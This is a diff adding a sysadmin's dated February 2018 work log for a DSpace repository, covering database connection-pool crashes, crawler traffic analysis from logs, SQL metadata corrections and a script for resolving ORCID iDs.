+<li>What&rsquo;s interesting is that the DSpace log says the connections are all busy:</li>
+</ul>
+<pre tabindex="0"><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-328] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>&hellip; but in PostgreSQL I see them <code>idle</code> or <code>idle in transaction</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -c dspaceWeb
+250
+$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c idle
+250
+$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
+187
+</code></pre><ul>
+<li>What the fuck, does DSpace think all connections are busy?</li>
+<li>I suspect these are issues with abandoned connections or maybe a leak, so I&rsquo;m going to try adding the <code>removeAbandoned='true'</code> parameter which is apparently off by default</li>
+<li>I will try <code>testOnReturn='true'</code> too, just to add more validation, because I&rsquo;m fucking grasping at straws</li>
+<li>Also, WTF, there was a heap space error randomly in catalina.out:</li>
+</ul>
+<pre tabindex="0"><code>Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-58&#34; java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>I&rsquo;m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons!</li>
+<li>Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11AM:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}&#39; | sort -n | uniq -c | sort -n | tail -n 20
+     34 ip_addr=46.229.168.67
+     34 ip_addr=46.229.168.73
+     37 ip_addr=46.229.168.76
+     40 ip_addr=34.232.65.41
+     41 ip_addr=46.229.168.71
+     44 ip_addr=197.210.168.174
+     55 ip_addr=181.137.2.214
+     55 ip_addr=213.55.99.121
+     58 ip_addr=46.229.168.65
+     64 ip_addr=66.249.66.91
+     67 ip_addr=66.249.66.90
+     71 ip_addr=207.46.13.54
+     78 ip_addr=130.82.1.40
+    104 ip_addr=40.77.167.36
+    151 ip_addr=68.180.228.157
+    174 ip_addr=207.46.13.135
+    194 ip_addr=54.83.138.123
+    198 ip_addr=40.77.167.62
+    210 ip_addr=207.46.13.71
+    214 ip_addr=104.196.152.243
+</code></pre><ul>
+<li>These IPs made thousands of sessions today:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+530
+$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+859
+$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+610
+$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+8
+$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+826
+$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+727
+$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+181
+$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+24
+$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+166
+$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+992
+</code></pre><ul>
+<li>Let&rsquo;s investigate who these IPs belong to:
+<ul>
+<li>104.196.152.243 is CIAT, which is already marked as a bot via nginx!</li>
+<li>207.46.13.71 is Bing, which is already marked as a bot in Tomcat&rsquo;s Crawler Session Manager Valve!</li>
+<li>40.77.167.62 is Bing, which is already marked as a bot in Tomcat&rsquo;s Crawler Session Manager Valve!</li>
+<li>207.46.13.135 is Bing, which is already marked as a bot in Tomcat&rsquo;s Crawler Session Manager Valve!</li>
+<li>68.180.228.157 is Yahoo, which is already marked as a bot in Tomcat&rsquo;s Crawler Session Manager Valve!</li>
+<li>40.77.167.36 is Bing, which is already marked as a bot in Tomcat&rsquo;s Crawler Session Manager Valve!</li>
+<li>207.46.13.54 is Bing, which is already marked as a bot in Tomcat&rsquo;s Crawler Session Manager Valve!</li>
+<li>46.229.168.x is Semrush, which is already marked as a bot in Tomcat&rsquo;s Crawler Session Manager Valve!</li>
+</ul>
+</li>
+<li>Nice, so these are all known bots that are already crammed into one session by Tomcat&rsquo;s Crawler Session Manager Valve.</li>
+<li>What in the actual fuck, why is our load doing this? It&rsquo;s gotta be something fucked up with the database pool being &ldquo;busy&rdquo; but everything is fucking idle</li>
+<li>One that I should probably add in nginx is 54.83.138.123, which is apparently the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>BUbiNG (+http://law.di.unimi.it/BUbiNG.html)
+</code></pre><ul>
+<li>This one makes two thousand requests per day or so recently:</li>
+</ul>
+<pre tabindex="0"><code># grep -c BUbiNG /var/log/nginx/access.log /var/log/nginx/access.log.1
+/var/log/nginx/access.log:1925
+/var/log/nginx/access.log.1:2029
+</code></pre><ul>
+<li>And they have 30 IPs, so fuck that shit I&rsquo;m going to add them to the Tomcat Crawler Session Manager Valve nowwww</li>
+<li>Lots of discussions on the dspace-tech mailing list over the last few years about leaky transactions being a known problem with DSpace</li>
+<li>Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker</li>
+<li>This is how the connections looked when it crashed this afternoon:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+    290 dspaceWeb
+</code></pre><ul>
+<li>This is how it is right now:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+      5 dspaceWeb
+</code></pre><ul>
+<li>So is this just some fucked up XMLUI database leaking?</li>
+<li>I notice there is an issue (that I&rsquo;ve probably noticed before) on the Jira tracker about this that was fixed in DSpace 5.7: <a href="https://jira.duraspace.org/browse/DS-3551">https://jira.duraspace.org/browse/DS-3551</a></li>
+<li>I seriously doubt this leaking shit is fixed for sure, but I&rsquo;m gonna cherry-pick all those commits and try them on DSpace Test and probably even CGSpace because I&rsquo;m fed up with this shit</li>
+<li>I cherry-picked all the commits for DS-3551 but it won&rsquo;t build on our current DSpace 5.5!</li>
+<li>I sent a message to the dspace-tech mailing list asking why DSpace thinks these connections are busy when PostgreSQL says they are idle</li>
+</ul>
+<h2 id="2018-02-10">2018-02-10</h2>
+<ul>
+<li>I tried to disable ORCID lookups but keep the existing authorities</li>
+<li>This item has an ORCID for Ralf Kiese: http://localhost:8080/handle/10568/89897</li>
+<li>Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn&rsquo;t show up on the item</li>
+<li>Leave all settings but change choices.presentation to lookup and ORCID badge is there and item submission uses LC Name Authority and it breaks with this error:</li>
+</ul>
+<pre tabindex="0"><code>Field dc_contributor_author has choice presentation of type &#34;select&#34;, it may NOT be authority-controlled.
+</code></pre><ul>
+<li>If I change choices.presentation to suggest it give this error:</li>
+</ul>
+<pre tabindex="0"><code>xmlui.mirage2.forms.instancedCompositeFields.noSuggestionError
+</code></pre><ul>
+<li>So I don&rsquo;t think we can disable the ORCID lookup function and keep the ORCID badges</li>
+</ul>
+<h2 id="2018-02-11">2018-02-11</h2>
+<ul>
+<li>Magdalena from CCAFS emailed to ask why one of their items has such a weird thumbnail: <a href="https://cgspace.cgiar.org/handle/10568/90735">10568/90735</a></li>
+</ul>
+<p><img src="/cgspace-notes/2018/02/CCAFS_WP_223.pdf.jpg" alt="Weird thumbnail"></p>
+<ul>
+<li>I downloaded the PDF and manually generated a thumbnail with ImageMagick and it looked better:</li>
+</ul>
+<pre tabindex="0"><code>$ convert CCAFS_WP_223.pdf\[0\] -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_cmyk.icc -thumbnail 600x600 -flatten -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_rgb.icc CCAFS_WP_223.jpg
+</code></pre><p><img src="/cgspace-notes/2018/02/CCAFS_WP_223.jpg" alt="Manual thumbnail"></p>
+<ul>
+<li>Peter sent me corrected author names last week but the file encoding is messed up:</li>
+</ul>
+<pre tabindex="0"><code>$ isutf8 authors-2018-02-05.csv
+authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between E1 and EC, expecting the 2nd byte between 80 and BF.
+</code></pre><ul>
+<li>The <code>isutf8</code> program comes from <code>moreutils</code></li>
+<li>Line 100 contains: Galiè, Alessandra</li>
+<li>In other news, psycopg2 is splitting their package in pip, so to install the binary wheel distribution you need to use <code>pip install psycopg2-binary</code></li>
+<li>See: <a href="http://initd.org/psycopg/articles/2018/02/08/psycopg-274-released/">http://initd.org/psycopg/articles/2018/02/08/psycopg-274-released/</a></li>
+<li>I updated my <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts on the scripts page: <a href="https://github.com/ilri/DSpace/wiki/Scripts">https://github.com/ilri/DSpace/wiki/Scripts</a></li>
+<li>I ran the 342 author corrections (after trimming whitespace and excluding those with <code>||</code> and other syntax errors) on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Then I ran a full Discovery re-indexing:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>That reminds me that Bizu had asked me to fix some of Alan Duncan&rsquo;s names in December</li>
+<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&rdquo;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
+<li>I will just update those for her too and then restart the indexing:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
+   text_value    |              authority               | confidence 
+-----------------+--------------------------------------+------------
+ Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 |        600
+ Duncan, Alan J. | 62298c84-4d9d-4b83-a932-4a9dd4046db7 |         -1
+ Duncan, Alan J. |                                      |         -1
+ Duncan, Alan    | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
+ Duncan, Alan J. | cd0e03bf-92c3-475f-9589-60c5b042ea60 |         -1
+ Duncan, Alan J. | a6486522-b08a-4f7a-84f9-3a73ce56034d |         -1
+ Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 |         -1
+ Duncan, Alan J. | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
+(8 rows)
+
+dspace=# begin;
+dspace=# update metadatavalue set text_value=&#39;Duncan, Alan&#39;, authority=&#39;a6486522-b08a-4f7a-84f9-3a73ce56034d&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Duncan, Alan%&#39;;
+UPDATE 216
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
+  text_value  |              authority               | confidence 
+--------------+--------------------------------------+------------
+ Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d |        600
+(1 row)
+dspace=# commit;
+</code></pre><ul>
+<li>Run all system updates on DSpace Test (linode02) and reboot it</li>
+<li>I wrote a Python script (<a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b"><code>resolve-orcids-from-solr.py</code></a>) using SolrClient to parse the Solr authority cache for ORCID IDs</li>
+<li>We currently have 1562 authority records with ORCID IDs, and 624 unique IDs</li>
+<li>We can use this to build a controlled vocabulary of ORCID IDs for new item submissions</li>
+<li>I don&rsquo;t know how to add ORCID IDs to existing items yet&hellip; some more querying of PostgreSQL for authority values perhaps?</li>
+<li>I added the script to the <a href="https://github.com/ilri/DSpace/wiki/Scripts">ILRI DSpace wiki on GitHub</a></li>
+</ul>
+<h2 id="2018-02-12">2018-02-12</h2>
+<ul>
+<li>Follow up with Atmire on the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 Compatibility ticket</a> to ask again if they want me to send them a DSpace 5.8 branch to work on</li>
+<li>Abenet asked if there was a way to get the number of submissions she and Bizuwork did</li>
+<li>I said that the Atmire Workflow Statistics module was supposed to be able to do that</li>
+<li>We had tried it in <a href="/cgspace-notes/2017-06/">June, 2017</a> and found that it didn&rsquo;t work</li>
+<li>Atmire sent us some fixes but they didn&rsquo;t work either</li>
+<li>I just tried the branch with the fixes again and it indeed does not work:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/02/atmire-workflow-statistics.png" alt="Atmire Workflow Statistics No Data Available"></p>
+<ul>
+<li>I see that in <a href="/cgspace-notes/2017-04/">April, 2017</a> I just used a SQL query to get a user&rsquo;s submissions by checking the <code>dc.description.provenance</code> field</li>
+<li>So for Abenet, I can check her submissions in December, 2017 with:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*yabowork.*2017-12.*&#39;;
+</code></pre><ul>
+<li>I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it</li>
+<li>This would be using <a href="https://www.linode.com/blockstorage">Linode&rsquo;s new block storage volumes</a></li>
+<li>I think our current $40/month Linode has enough CPU and memory capacity, but we need more disk space</li>
+<li>I think I&rsquo;d probably just attach the block storage volume and mount it on /home/dspace</li>
+<li>Ask Peter about <code>dc.rights</code> on DSpace Test again, if he likes it then we should move it to CGSpace soon</li>
+</ul>
+<h2 id="2018-02-13">2018-02-13</h2>
+<ul>
+<li>Peter said he was getting a &ldquo;socket closed&rdquo; error on CGSpace</li>
+<li>I looked in the dspace.log.2018-02-13 and saw one recent one:</li>
+</ul>
+<pre tabindex="0"><code>2018-02-13 12:50:13,656 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error - 
+org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
+...
+Caused by: java.net.SocketException: Socket closed
+</code></pre><ul>
+<li>Could be because of the <code>removeAbandoned=&quot;true&quot;</code> that I enabled in the JDBC connection pool last week?</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;java.net.SocketException: Socket closed&#34; dspace.log.2018-02-*
+dspace.log.2018-02-01:0
+dspace.log.2018-02-02:0
+dspace.log.2018-02-03:0
+dspace.log.2018-02-04:0
+dspace.log.2018-02-05:0
+dspace.log.2018-02-06:0
+dspace.log.2018-02-07:0
+dspace.log.2018-02-08:1
+dspace.log.2018-02-09:6
+dspace.log.2018-02-10:0
+dspace.log.2018-02-11:3
+dspace.log.2018-02-12:0
+dspace.log.2018-02-13:4
+</code></pre><ul>
+<li>I apparently added that on 2018-02-07 so it could be, as I don&rsquo;t see any of those socket closed errors in 2018-01&rsquo;s logs!</li>
+<li>I will increase the removeAbandonedTimeout from its default of 60 to 90 and enable logAbandoned</li>
+<li>Peter hit this issue one more time, and this is apparently what Tomcat&rsquo;s catalina.out log says when an abandoned connection is removed:</li>
+</ul>
+<pre tabindex="0"><code>Feb 13, 2018 2:05:42 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
+WARNING: Connection has been abandoned PooledConnection[org.postgresql.jdbc.PgConnection@22e107be]:java.lang.Exception
+</code></pre><h2 id="2018-02-14">2018-02-14</h2>
+<ul>
+<li>Skype with Peter and the Addis team to discuss what we need to do for the ORCIDs in the immediate future</li>
+<li>We said we&rsquo;d start with a controlled vocabulary for <code>cg.creator.id</code> on the DSpace Test submission form, where we store the author name and the ORCID in some format like: Alan S. Orth (0000-0002-1735-7458)</li>
+<li>Eventually we need to find a way to print the author names with links to their ORCID profiles</li>
+<li>Abenet will send an email to the partners to give us ORCID IDs for their authors and to stress that they update their name format on ORCID.org if they want it in a special way</li>
+<li>I sent the Codeobia guys a question to ask how they prefer that we store the IDs, ie one of:
+<ul>
+<li>Alan Orth - 0000-0002-1735-7458</li>
+<li>Alan Orth: 0000-0002-1735-7458</li>
+<li>Alan S. Orth (0000-0002-1735-7458)</li>
+</ul>
+</li>
+<li>Atmire responded on the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 compatability ticket</a> and said they will let me know if they they want me to give them a clean 5.8 branch</li>
+<li>I formatted my list of ORCID IDs as a controlled vocabulary, sorted alphabetically, then ran through XML tidy:</li>
+</ul>
+<pre tabindex="0"><code>$ sort cgspace-orcids.txt &gt; dspace/config/controlled-vocabularies/cg-creator-id.xml
+$ add XML formatting...
+$ tidy -xml -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>It seems the tidy fucks up accents, for example it turns <code>Adriana Tofiño (0000-0001-7115-7169)</code> into <code>Adriana TofiÃ±o (0000-0001-7115-7169)</code></li>
+<li>We need to force UTF-8:</li>
+</ul>
+<pre tabindex="0"><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+</code></pre><ul>
+<li>This preserves special accent characters</li>
+<li>I tested the display and store of these in the XMLUI and PostgreSQL and it looks good</li>
+<li>Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+</li>
+<li>Peter combined it with mine and we have 1204 unique ORCIDs!</li>
+</ul>
+<pre tabindex="0"><code>$ grep -coE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv
+1204
+$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
+1204
+</code></pre><ul>
+<li>Also, save that regex for the future because it will be very useful!</li>
+<li>CIAT sent a list of their authors&rsquo; ORCIDs and combined with ours there are now 1227:</li>
+</ul>
+<pre tabindex="0"><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
+1227
+</code></pre><ul>
+<li>There are some formatting issues with names in Peter&rsquo;s list, so I should remember to re-generate the list of names from ORCID&rsquo;s API once we&rsquo;re done</li>
+<li>The <code>dspace cleanup -v</code> currently fails on CGSpace with the following:</li>
+</ul>
+<pre tabindex="0"><code> - Deleting bitstream record from database (ID: 149473)
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(149473) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is to update the bitstream table, as I&rsquo;ve discovered several other times in 2016 and 2017:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>Then the cleanup process will continue for awhile and hit another foreign key conflict, and eventually it will complete after you manually resolve them all</li>
+</ul>
+<h2 id="2018-02-15">2018-02-15</h2>
+<ul>
+<li>Altmetric seems to be indexing DSpace Test for some reason:
+<ul>
+<li>See this item on DSpace Test: <a href="https://dspacetest.cgiar.org/handle/10568/78450">https://dspacetest.cgiar.org/handle/10568/78450</a></li>
+<li>See the corresponding page on Altmetric: <a href="https://www.altmetric.com/details/handle/10568/78450">https://www.altmetric.com/details/handle/10568/78450</a></li>
+</ul>
+</li>
+<li>And this item doesn&rsquo;t even exist on CGSpace!</li>
+<li>Start working on XMLUI item display code for ORCIDs</li>
+<li>Send emails to Macaroni Bros and Usman at CIFOR about ORCID metadata</li>
+<li>CGSpace crashed while I was driving to Tel Aviv, and was down for four hours!</li>
+<li>I only looked quickly in the logs but saw a bunch of database errors</li>
+<li>PostgreSQL connections are currently:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | uniq -c
+      2 dspaceApi
+      1 dspaceWeb
+      3 dspaceApi
+</code></pre><ul>
+<li>I see shitloads of memory errors in Tomcat&rsquo;s logs:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;Java heap space&#34; /var/log/tomcat7/catalina.out
+56
+</code></pre><ul>
+<li>And shit tons of database connections abandoned:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
+612
+</code></pre><ul>
+<li>I have no fucking idea why it crashed</li>
+<li>The XMLUI activity looks like:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;15/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    715 63.143.42.244
+    746 213.55.99.121
+    886 68.180.228.157
+    967 66.249.66.90
+   1013 216.244.66.245
+   1177 197.210.168.174
+   1419 207.46.13.159
+   1512 207.46.13.59
+   1554 207.46.13.157
+   2018 104.196.152.243
+</code></pre><h2 id="2018-02-17">2018-02-17</h2>
+<ul>
+<li>Peter pointed out that we had an incorrect sponsor in the controlled vocabulary: <code>U.S. Agency for International Development</code> → <code>United States Agency for International Development</code></li>
+<li>I made a pull request to fix it ((#354)[https://github.com/ilri/DSpace/pull/354])</li>
+<li>I should remember to update existing values in PostgreSQL too:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
+UPDATE 2
+</code></pre><h2 id="2018-02-18">2018-02-18</h2>
+<ul>
+<li>ICARDA&rsquo;s Mohamed Salem pointed out that it would be easiest to format the <code>cg.creator.id</code> field like &ldquo;Alan Orth: 0000-0002-1735-7458&rdquo; because no name will have a &ldquo;:&rdquo; so it&rsquo;s easier to split on</li>
+<li>I finally figured out a few ways to extract ORCID iDs from metadata using XSLT and display them in the XMLUI:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/02/xmlui-orcid-display.png" alt="Displaying ORCID iDs in XMLUI"></p>
+<ul>
+<li>The one on the bottom left uses a similar format to our author display, and the one in the middle uses the format <a href="https://orcid.org/trademark-and-id-display-guidelines">recommended by ORCID&rsquo;s branding guidelines</a></li>
+<li>Also, I realized that the Academicons font icon set we&rsquo;re using includes an ORCID badge so we don&rsquo;t need to use the PNG image anymore</li>
+<li>Run system updates on DSpace Test (linode02) and reboot the server</li>
+<li>Looking back at the system errors on 2018-02-15, I wonder what the fuck caused this:</li>
+</ul>
+<pre tabindex="0"><code>$ wc -l dspace.log.2018-02-1{0..8}
+   383483 dspace.log.2018-02-10
+   275022 dspace.log.2018-02-11
+   249557 dspace.log.2018-02-12
+   280142 dspace.log.2018-02-13
+   615119 dspace.log.2018-02-14
+  4388259 dspace.log.2018-02-15
+   243496 dspace.log.2018-02-16
+   209186 dspace.log.2018-02-17
+   167432 dspace.log.2018-02-18
+</code></pre><ul>
+<li>From an average of a few hundred thousand to over four million lines in DSpace log?</li>
+<li>Using grep&rsquo;s <code>-B1</code> I can see the line before the heap space error, which has the time, ie:</li>
+</ul>
+<pre tabindex="0"><code>2018-02-15 16:02:12,748 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>So these errors happened at hours 16, 18, 19, and 20</li>
+<li>Let&rsquo;s see what was going on in nginx then:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
+168571
+# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | wc -l
+8188
+</code></pre><ul>
+<li>Only 8,000 requests during those four hours, out of 170,000 the whole day!</li>
+<li>And the usage of XMLUI, REST, and OAI looks SUPER boring:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    111 95.108.181.88
+    158 45.5.184.221
+    201 104.196.152.243
+    205 68.180.228.157
+    236 40.77.167.131 
+    253 207.46.13.159
+    293 207.46.13.59
+    296 63.143.42.242
+    303 207.46.13.157
+    416 63.143.42.244
+</code></pre><ul>
+<li>63.143.42.244 is Uptime Robot, and 207.46.x.x is Bing!</li>
+<li>The DSpace sessions, PostgreSQL connections, and JVM memory all look normal</li>
+<li>I see a lot of AccessShareLock on February 15th&hellip;?</li>
+</ul>
+<p><img src="/cgspace-notes/2018/02/postgresql-locks-week.png" alt="PostgreSQL locks"></p>
+<ul>
+<li>I have no idea what caused this crash</li>
+<li>In other news, I adjusted the ORCID badge size on the XMLUI item display and sent it back to Peter for feedback</li>
+</ul>
+<h2 id="2018-02-19">2018-02-19</h2>
+<ul>
+<li>Combined list of CGIAR author ORCID iDs is up to 1,500:</li>
+</ul>
+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l  
+1571
+</code></pre><ul>
+<li>I updated my <code>resolve-orcids-from-solr.py</code> script to be able to resolve ORCID identifiers from a text file so I renamed it to <code>resolve-orcids.py</code></li>
+<li>Also, I updated it so it uses several new options:</li>
+</ul>
+<pre tabindex="0"><code>$ ./resolve-orcids.py -i input.txt -o output.txt
+$ cat output.txt 
+Ali Ramadhan: 0000-0001-5019-1368
+Ahmad Maryudi: 0000-0001-5051-7217
+</code></pre><ul>
+<li>I was running this on the new list of 1571 and found an error:</li>
+</ul>
+<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0001-9634-1958
+Traceback (most recent call last):
+  File &#34;./resolve-orcids.py&#34;, line 111, in &lt;module&gt;
+    read_identifiers_from_file()
+  File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
+    resolve_orcid_identifiers(orcids)
+  File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
+    family_name = data[&#39;name&#39;][&#39;family-name&#39;][&#39;value&#39;]
+TypeError: &#39;NoneType&#39; object is not subscriptable
+</code></pre><ul>
+<li>According to ORCID that identifier&rsquo;s family-name is null so that sucks</li>
+<li>I fixed the script so that it checks if the family name is null</li>
+<li>Now another:</li>
+</ul>
+<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0002-1300-3636
+Traceback (most recent call last):
+  File &#34;./resolve-orcids.py&#34;, line 117, in &lt;module&gt;
+    read_identifiers_from_file()
+  File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
+    resolve_orcid_identifiers(orcids)
+  File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
+    if data[&#39;name&#39;][&#39;given-names&#39;]:
+TypeError: &#39;NoneType&#39; object is not subscriptable
+</code></pre><ul>
+<li>According to ORCID that identifier&rsquo;s entire name block is null!</li>
+</ul>
+<h2 id="2018-02-20">2018-02-20</h2>
+<ul>
+<li>Send Abenet an email about getting a purchase requisition for a new DSpace Test server on Linode</li>
+<li>Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet and I think we&rsquo;ll now only use ORCID iDs that have been sent to use from partners, not those extracted via keyword searches on orcid.org</li>
+<li>This should be the version we use (the existing controlled vocabulary generated from CGSpace&rsquo;s Solr authority core plus the IDs sent to us so far by partners):</li>
+</ul>
